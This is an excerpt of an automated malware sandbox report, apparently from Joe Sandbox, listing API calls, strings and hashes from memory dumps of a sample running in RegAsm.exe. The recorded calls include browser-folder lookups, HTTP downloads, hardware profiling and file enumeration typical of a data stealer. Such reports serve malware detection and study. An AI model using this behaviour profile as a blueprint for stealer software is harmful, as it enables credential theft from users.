                                                                                                                                                                                                  • Part of subcall function 0040B20D: memcmp.MSVCRT ref: 0040B2A3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                • String ID: #$Opera GX
                                                                                                                                                                                                • API String ID: 2375657845-1046280356
                                                                                                                                                                                                • Opcode ID: 8866180c248b04107ceca5b02e10f312feb85f5beb80ce1b124fe179e79141c5
                                                                                                                                                                                                • Instruction ID: a684bc4bbdfdd742dd69a8864078cee1b8c31bdc79ed69174b03648f1a7ae84f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8866180c248b04107ceca5b02e10f312feb85f5beb80ce1b124fe179e79141c5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B0280B190024CEADF04EBE6D946ADEBBB8AF15304F10456FE445732C2DB781B18DB66
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?,?), ref: 1B49FE03
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • winRead, xrefs: 1B49FE3D
                                                                                                                                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B49FE78
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
• Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                • API String ID: 2738559852-1843600136
                                                                                                                                                                                                • Opcode ID: 58db7b8644488676fb928779716aa6e564040abf7404ed06bab8c93298f02520
                                                                                                                                                                                                • Instruction ID: 9b9df00a12a0ec12a708bc468b00b4bbadf7eea6aded18a13cd8dbcd08b2ed36
                                                                                                                                                                                                • Opcode Fuzzy Hash: 58db7b8644488676fb928779716aa6e564040abf7404ed06bab8c93298f02520
                                                                                                                                                                                                • Instruction Fuzzy Hash: D5412A726043456BC704EE64DD81AEBBBE9FFC8610F844A2DF545C3640E735F9188BA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00412252
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0041226F
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412333
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrlen
                                                                                                                                                                                                • String ID: ERROR
                                                                                                                                                                                                • API String ID: 2133942097-2861137601
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00411F5E
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00404F61: _EH_prolog.MSVCRT ref: 00404F66
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FC9
                                                                                                                                                                                                  • Part of subcall function 00404F61: StrCmpCA.SHLWAPI(?), ref: 00404FDD
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405000
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405036
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040505A
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405065
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405083
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411FBC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                • String ID: ERROR$ERROR
                                                                                                                                                                                                • API String ID: 1120091252-2579291623
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,b9A), ref: 00410004
                                                                                                                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041001F
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410026
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                • String ID: b9A
                                                                                                                                                                                                • API String ID: 3183270410-3142400736
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00412387: _EH_prolog.MSVCRT ref: 0041238C
                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004134DB
                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2678630583-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042560C), ref: 0040EE1B
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042560C,00000000,?), ref: 0040EE22
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040EE40
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040EE5C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3676486918-0
                                                                                                                                                                                                • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                                                                                                                                • Instruction ID: 8df98c4356d6ba5c673d2f3e4e9eaa3c3292b94e57536a3ef5c29255e46278c9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF05E7A240218FFFB109BD1DD0EFAA7A7EEB49B40F101025FB01A61A0D7B05910DB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: X%@$X%@
                                                                                                                                                                                                • API String ID: 0-1360290420
                                                                                                                                                                                                • Opcode ID: cdd6bf8acb1831ea22f9c716b98bf9ca8420b0d814f1c98a3a420e7b2a83f701
                                                                                                                                                                                                • Instruction ID: cf7e05bcfaffb67bdf61be98b9eede3023c8ead03337331c96351d350a792ce1
                                                                                                                                                                                                • Opcode Fuzzy Hash: cdd6bf8acb1831ea22f9c716b98bf9ca8420b0d814f1c98a3a420e7b2a83f701
                                                                                                                                                                                                • Instruction Fuzzy Hash: B54126716001199FCB11CF69D8806E97BB1FF89318F2484BADD55EB3D1C6B86A82CF94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00407217
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040744E
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407462
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3193997572-0
                                                                                                                                                                                                • Opcode ID: aa30eeed4bc7dac8cae5baff6477bb5d9dcc111a12ef166f0b5fbb837fd81543
                                                                                                                                                                                                • Instruction ID: 20d53aa34b81a93204c6663b7f22e2839dc83b0775b4e1a5468bce4c384ac1c7
                                                                                                                                                                                                • Opcode Fuzzy Hash: aa30eeed4bc7dac8cae5baff6477bb5d9dcc111a12ef166f0b5fbb837fd81543
                                                                                                                                                                                                • Instruction Fuzzy Hash: E3A17070804148EACB05EBE6D955FEDBBB5AF29304F1044AEE446731C2DB381B18DB36
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00410DDC
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00404E01: _EH_prolog.MSVCRT ref: 00404E06
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E55
                                                                                                                                                                                                  • Part of subcall function 00404E01: StrCmpCA.SHLWAPI(?), ref: 00404E6F
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E93
                                                                                                                                                                                                  • Part of subcall function 00404E01: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404EB4
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404EFF
                                                                                                                                                                                                  • Part of subcall function 00404E01: CloseHandle.KERNEL32(?,?,00000400), ref: 00404F19
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetCloseHandle.WININET(00000000), ref: 00404F20
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetCloseHandle.WININET(?), ref: 00404F29
                                                                                                                                                                                                  • Part of subcall function 00404E01: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404EDB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                                                                                                                                • String ID: B
                                                                                                                                                                                                • API String ID: 1244342732-1255198513
                                                                                                                                                                                                • Opcode ID: 324544c4bad2dee823ecc960884b3d64476df60fc2fdc29d288224dbe24d92ba
                                                                                                                                                                                                • Instruction ID: b60c9e6c074299f836346ddbc8f3b1801eaeb38e4f6ef2cf0ab467e1a8c8ed7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 324544c4bad2dee823ecc960884b3d64476df60fc2fdc29d288224dbe24d92ba
                                                                                                                                                                                                • Instruction Fuzzy Hash: 40529B70905288EADB05E7E6C956FDCBBB56F29308F1044AEE445732C2DB781B08DB76
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040A9D2
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00410DD7: _EH_prolog.MSVCRT ref: 00410DDC
                                                                                                                                                                                                  • Part of subcall function 00406531: _EH_prolog.MSVCRT ref: 00406536
                                                                                                                                                                                                  • Part of subcall function 00406531: GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00424B9C,?,?,?,00424B97,00000000), ref: 004065F3
                                                                                                                                                                                                  • Part of subcall function 00406531: SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00424BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00424B9B), ref: 0040666B
                                                                                                                                                                                                  • Part of subcall function 00406531: LoadLibraryA.KERNEL32(00000000), ref: 00406686
                                                                                                                                                                                                  • Part of subcall function 00409531: _EH_prolog.MSVCRT ref: 00409536
                                                                                                                                                                                                  • Part of subcall function 00409531: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00424E1C,?,?,00424BFA,00000000), ref: 004095B3
                                                                                                                                                                                                  • Part of subcall function 00409531: StrCmpCA.SHLWAPI(?,00424E20), ref: 004095D0
                                                                                                                                                                                                  • Part of subcall function 00409531: StrCmpCA.SHLWAPI(?,00424E24), ref: 004095EA
                                                                                                                                                                                                  • Part of subcall function 00409531: StrCmpCA.SHLWAPI(?,00000000,?,?,?,00424E28,?,?,00424BFB), ref: 00409681
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$EnvironmentFileVariablelstrcat$AttributesFindFirstFolderLibraryLoadPathlstrlen
                                                                                                                                                                                                • String ID: \..\
                                                                                                                                                                                                • API String ID: 1701172651-4220915743
                                                                                                                                                                                                • Opcode ID: b772c2a2e400509bce44cfd7e628216374ce88d2679811f26c0ccdd0640c47d1
                                                                                                                                                                                                • Instruction ID: d4a3a95d9eb8acf38289eb4a3dd745c7f014d657264399f41b6c589d77bee939
                                                                                                                                                                                                • Opcode Fuzzy Hash: b772c2a2e400509bce44cfd7e628216374ce88d2679811f26c0ccdd0640c47d1
                                                                                                                                                                                                • Instruction Fuzzy Hash: CD819770801288EACB05EBE6C556BDDBF74AF15308F54446FE441732C2DB781718CBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405EE4), ref: 00405E34
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-3916222277
                                                                                                                                                                                                • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                                                                                                                                • Instruction ID: 37a58eeab65d3aafdbf6c8aaf8a854ca426e677cf365e9249ccdf1e7d7c71616
                                                                                                                                                                                                • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45114C71510A09ABDB20CF94D5887ABB7E5FB04344F644437A581E22C0C778AB45EFE9
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FolderPathlstrcpy
                                                                                                                                                                                                • String ID: {LB
                                                                                                                                                                                                • API String ID: 1699248803-1677426198
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F500
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProfile
                                                                                                                                                                                                • String ID: Unknown
                                                                                                                                                                                                • API String ID: 2104809126-1654365787
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • failed to allocate %u bytes of memory, xrefs: 1B4C04E7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                • API String ID: 0-1168259600
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                Memory Dump Source
